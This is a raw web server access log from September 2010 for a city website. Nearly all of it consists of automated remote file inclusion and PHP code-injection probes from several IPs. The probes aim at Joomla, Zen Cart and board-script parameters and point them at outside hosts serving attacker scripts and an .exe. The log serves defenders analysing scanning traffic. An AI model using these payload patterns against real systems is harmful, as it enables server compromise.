79.143.178.23 - - [02/Sep/2010:01:28:36 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:29:06 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:29:06 -0700] "GET /logs/access_091231.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:29:07 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:29:28 -0700] "GET /logs/access_091201.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:31:39 -0700] "GET /logs/access_091031.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:34:50 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:34:50 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:34:50 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:35:34 -0700] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:01:35:49 -0700] "GET /logs/access_091201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.180.209.11 - - [02/Sep/2010:01:50:53 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 4503867 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "cityofarkadelphia.com"
204.188.241.2 - - [02/Sep/2010:02:04:37 -0700] "GET /htmltonuke.php?filnavn=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.188.241.2 - - [02/Sep/2010:02:04:37 -0700] "GET /logs/access_091201.log%20%20/htmltonuke.php?filnavn=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.188.241.2 - - [02/Sep/2010:02:04:37 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.188.241.2 - - [02/Sep/2010:02:04:48 -0700] "GET /logs/access_090731.log%20%20/htmltonuke.php?filnavn=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:13:11 -0700] "GET /logs/access_100330.log/errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:13:11 -0700] "GET /errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:13:12 -0700] "GET /logs//errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:15:11 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:15:12 -0700] "GET /logs/access_091231.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:15:12 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:15:32 -0700] "GET /logs/access_091231.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:15:32 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:15:32 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:16:07 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:16:35 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:19:00 -0700] "GET /logs/access_100101.log/errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:19:05 -0700] "GET /errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:19:10 -0700] "GET /logs//errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:19:11 -0700] "GET /logs/access_100201.log/errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:32:03 -0700] "GET /logs/access_100531.log/cropcanvas.php?cropimagedir=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:32:08 -0700] "GET /cropcanvas.php?cropimagedir=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:32:14 -0700] "GET /logs//cropcanvas.php?cropimagedir=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:02:32:19 -0700] "GET /logs/access_100330.log/cropcanvas.php?cropimagedir=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:32:52 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:32:53 -0700] "GET /logs/access_091231.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:32:54 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:33:42 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:38:49 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:38:50 -0700] "GET /logs/access_091231.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:38:50 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:39:44 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.175.94.58 - - [02/Sep/2010:02:41:26 -0700] "GET /logs//board/bbs//write_update.php?board_skin_path=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
69.175.94.58 - - [02/Sep/2010:02:41:26 -0700] "GET /board/bbs//write_update.php?board_skin_path=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
187.45.193.226 - - [02/Sep/2010:02:49:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
69.175.94.58 - - [02/Sep/2010:02:50:13 -0700] "GET /logs/access_100201.log//board/bbs//write_update.php?board_skin_path=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:52:23 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:52:23 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:52:23 -0700] "GET /logs/access_091201.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.175.94.58 - - [02/Sep/2010:02:54:55 -0700] "GET /errors.php?error=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
69.175.94.58 - - [02/Sep/2010:02:54:55 -0700] "GET /logs//errors.php?error=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
69.175.94.58 - - [02/Sep/2010:02:54:55 -0700] "GET /logs/access_090731.log//errors.php?error=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:55:48 -0700] "GET /logs/access_100201.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:57:16 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:57:18 -0700] "GET /logs/access_091201.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:02:57:22 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:00:35 -0700] "GET /logs/access_100201.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:11:29 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:11:30 -0700] "GET /logs/access_091201.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:11:30 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:11:38 -0700] "GET /logs/access_091201.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:11:38 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:11:41 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.199.47 - - [02/Sep/2010:03:13:38 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:03:15:40 -0700] "GET /logs/access_091231.log/errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:03:15:41 -0700] "GET /errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.42.227.155 - - [02/Sep/2010:03:15:46 -0700] "GET /logs//errors.php?error=http://xxk.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:19:11 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:19:11 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:19:12 -0700] "GET /logs/access_091201.log%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:19:48 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:19:49 -0700] "GET /logs/access_091201.log%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:19:51 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [02/Sep/2010:03:20:12 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [02/Sep/2010:03:20:12 -0700] "GET /logs/access_100201.log%20%20/akocomments.php?mosConfig_absolute_path=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [02/Sep/2010:03:20:12 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [02/Sep/2010:03:22:34 -0700] "GET /logs/access_091231.log%20%20/akocomments.php?mosConfig_absolute_path=http://kwiketa-skwirk.com/images/bobrok1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:03:23:09 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.143.178.23 - - [02/Sep/2010:03:23:40 -0700] "GET /logs/access_100201.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://panaca.com.co/web/images/stories/j1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:03:35:24 -0700] "GET /config/dbutil.bck.php?confdir=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:03:35:24 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:03:35:24 -0700] "GET /logs/access_100201.log%20%20//config/dbutil.bck.php?confdir=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:03:35:27 -0700] "GET /config/dbutil.bck.php?confdir=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:03:35:27 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:03:35:27 -0700] "GET /logs/access_100201.log%20%20//config/dbutil.bck.php?confdir=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:03:36:38 -0700] "GET /logs/access_091201.log%20%20//config/dbutil.bck.php?confdir=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.8.200 - - [02/Sep/2010:03:36:38 -0700] "GET /logs/access_091201.log%20%20//config/dbutil.bck.php?confdir=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:15 -0700] "GET /logs/access_100201.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:15 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:15 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:17 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:17 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:17 -0700] "GET /logs/access_100201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:18 -0700] "GET /logs/access_100201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:18 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:19 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:19 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:19 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:19 -0700] "GET /logs/access_100201.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:19 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:19 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:20 -0700] "GET /logs/access_100201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:20 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:20 -0700] "GET /logs/access_100201.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:20 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:55 -0700] "GET /logs/access_091231.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:40:56 -0700] "GET /logs/access_091231.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:41:02 -0700] "GET /logs/access_091231.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:41:03 -0700] "GET /logs/access_091231.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
